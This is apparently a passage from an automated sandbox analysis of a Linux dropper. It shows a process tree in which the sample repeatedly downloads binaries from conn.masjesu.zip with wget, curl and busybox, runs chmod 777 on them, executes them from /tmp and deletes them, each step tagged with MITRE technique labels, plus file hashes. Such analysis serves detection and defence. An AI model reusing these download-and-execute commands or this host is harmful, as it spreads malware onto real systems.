/bin/chmodchmod 777 tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵
- File and Directory Permissions Modification
PID:935
-
-
/tmp/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq./tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵
- Executes dropped EXE
PID:936
-
-
/bin/rmrm tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵PID:937
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵
- System Network Configuration Discovery
PID:938
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:939
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵
- System Network Configuration Discovery
PID:941
-
-
/bin/chmodchmod 777 xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵
- File and Directory Permissions Modification
PID:942
-
-
/tmp/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr./xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵
- Executes dropped EXE
PID:943
-
-
/bin/rmrm xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵PID:944
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵
- System Network Configuration Discovery
PID:945
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:946
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵
- System Network Configuration Discovery
PID:948
-
-
/bin/chmodchmod 777 ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ./ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵PID:951
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵PID:952
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵PID:955
-
-
/bin/chmodchmod 777 p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵
- File and Directory Permissions Modification
PID:956
-
-
/tmp/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX./p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵
- Executes dropped EXE
PID:957
-
-
/bin/rmrm p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵PID:958
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵
- System Network Configuration Discovery
PID:959
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:960
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵
- System Network Configuration Discovery
PID:962
-
-
/bin/chmodchmod 777 7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08./7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm 7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵PID:965
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵PID:966
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵
- System Network Configuration Discovery
PID:969
-
-
/bin/chmodchmod 777 e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵
- File and Directory Permissions Modification
PID:970
-
-
/tmp/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE./e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵
- Executes dropped EXE
PID:971
-
-
/bin/rmrm e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵PID:972
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵
- System Network Configuration Discovery
PID:973
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵
- Reads runtime system information
- Writes file to tmp directory
PID:974
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵PID:976
-
-
/bin/chmodchmod 777 upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵
- File and Directory Permissions Modification
PID:977
-
-
/tmp/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27./upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵
- Executes dropped EXE
PID:978
-
-
/bin/rmrm upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵PID:979
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵
- System Network Configuration Discovery
PID:980
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:981
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵
- System Network Configuration Discovery
PID:983
-
-
/bin/chmodchmod 777 kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵
- File and Directory Permissions Modification
PID:984
-
-
/tmp/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB./kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵
- Executes dropped EXE
PID:985
-
-
/bin/rmrm kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵PID:986
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵PID:987
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:988
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵PID:990
-
-
/bin/chmodchmod 777 X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵
- File and Directory Permissions Modification
PID:991
-
-
/tmp/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl./X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵
- Executes dropped EXE
PID:992
-
-
/bin/rmrm X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵PID:993
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵
- System Network Configuration Discovery
PID:994
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:995
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵
- System Network Configuration Discovery
PID:997
-
-
/bin/chmodchmod 777 7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵
- File and Directory Permissions Modification
PID:998
-
-
/tmp/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J./7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵
- Executes dropped EXE
PID:999
-
-
/bin/rmrm 7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵PID:1000
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97